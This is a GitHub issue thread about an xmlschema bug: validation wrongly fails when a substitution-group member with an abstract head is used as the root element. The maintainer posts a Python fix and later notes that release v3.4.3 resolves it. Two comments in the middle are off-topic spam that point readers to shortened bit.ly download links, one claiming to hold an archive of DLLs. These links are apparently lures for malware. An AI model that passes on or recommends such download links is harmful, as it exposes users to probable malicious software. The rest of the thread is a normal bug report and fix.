### ISSUE TITLE
Incorrect Validation Error for Substitution Group with Abstract Head

### ISSUE THREAD

**Issue by StanimirIglev** [sissaschool/xmlschema#417]
## Description:

The `xmlschema` library incorrectly invalidates XML documents that use elements from a substitution group whose head is abstract. According to the W3C XML Schema specifications, substitution group members can appear in the instance document even if the head element is abstract.

## To reproduce:
1. XML Schema (`schema.xsd`):
```xml
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
    <xs:element name="abstractSubgroupHead" type="xs:integer" abstract="true"/>
    <xs:element name="subgroupMember" type="xs:positiveInteger" substitutionGroup="abstractSubgroupHead"/>
</xs:schema>
```
2. XML document (`document.xml`):
```xml
<subgroupMember>1</subgroupMember>
```
3. Validate:
```bash
xmlschema-validate --schema schema.xsd document.xml -v
```

## Expected behavior:
The XML document should be validated successfully because `subgroupMember` is a global element; thus, a valid root within the instance document.

## Actual behavior:
The `xmlschema` library reports the following error:
```
document.xml is not valid
failed validating <Element 'subgroupMember' at 0x7f6285136110> with XsdElement(name='abstractSubgroupHead', occurs=[1, 1]):

Reason: cannot use an abstract element for validation

Schema component:

  <xs:element xmlns:xs="http://www.w3.org/2001/XMLSchema" name="abstractSubgroupHead" type="xs:integer" abstract="true" />

Instance type: <class 'xml.etree.ElementTree.Element'>

Instance:

  <subgroupMember>1</subgroupMember>

Path: /subgroupMember
```

## Environment:
- `xmlschema` version: 3.4.0
- Python version: 3.11.8

## Additional notes:
- The bug happens regardless of whether one uses the CLI or the API (`is_valid` and `validate`).
- I believe the problem occurs only when the substitution element is used as a root element of the instance document, i.e., if there is another global element with complex type, which contains a reference to the abstract subgroup head, the validation is correct.

**Comment by andreyfmc** [comment]
I think this will help you.
https://bit.ly/4gwC82r
I put the necessary dlls in the archive

**Comment by aleroldan156** [comment]
download
https://bit.ly/4gx42eQ
If you don't have the c compliator, install it.(gcc or clang)

**Comment by brunato** [comment]
Hi,
I will insert a fix in the next release of the package.

The fix requires a change of these lines:

https://github.com/sissaschool/xmlschema/blob/059fd3bfb305809d5ebdede1bd68dff9dbaf3348/xmlschema/validators/elements.py#L597-L599 

adding a part for delegating the validation/decode to a substitute:

```python
        if self.abstract:
            if self.name not in self.maps.substitution_groups:
                reason = _("can't use an abstract element for validation "
                           "unless it's the head of a substitution group")
                yield self.validation_error(validation, reason, obj, **kwargs)
            else:
                for xsd_element in self.iter_substitutes():
                    if obj.tag == xsd_element.name:
                        yield from xsd_element.iter_decode(obj, validation, **kwargs)
                return
```

I will extend also encoding part to process abstract elements and substitution (the tag matching is not so simple, because it depends by the convention used for decoded data).

Thank you for the contribution

**Comment by StanimirIglev** [comment]
Hi,

Thank you for addressing the problem. The solution indeed seems to work.

I have one question related to the issue. Why does the validation even start from the abstract element, shouldn't the validation begin from the substitution element?
The reason I am asking for this is the following. If the substitution element's name is lexicographically smaller than the abstract subgroup head element, the validation seems to work seamlessly even with the old implementation. For example consider the following schema

```xml
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
    <xs:element name="subgroupHead" type="xs:integer" abstract="true"/>
    <xs:element name="aSubgroupMember" type="xs:positiveInteger" substitutionGroup="subgroupHead"/>
</xs:schema>
``` 
and the following document:

```xml
<aSubgroupMember>1</aSubgroupMember>
```

For those, the validation works totally fine.

I'm just wondering how you decide which one would be the most appropriate definition to start the validation from.

Thanks, once again, for the invested time and the solution.

**Comment by brunato** [comment]
Hi, release v3.4.3 contains a fix for this issue.
thank you
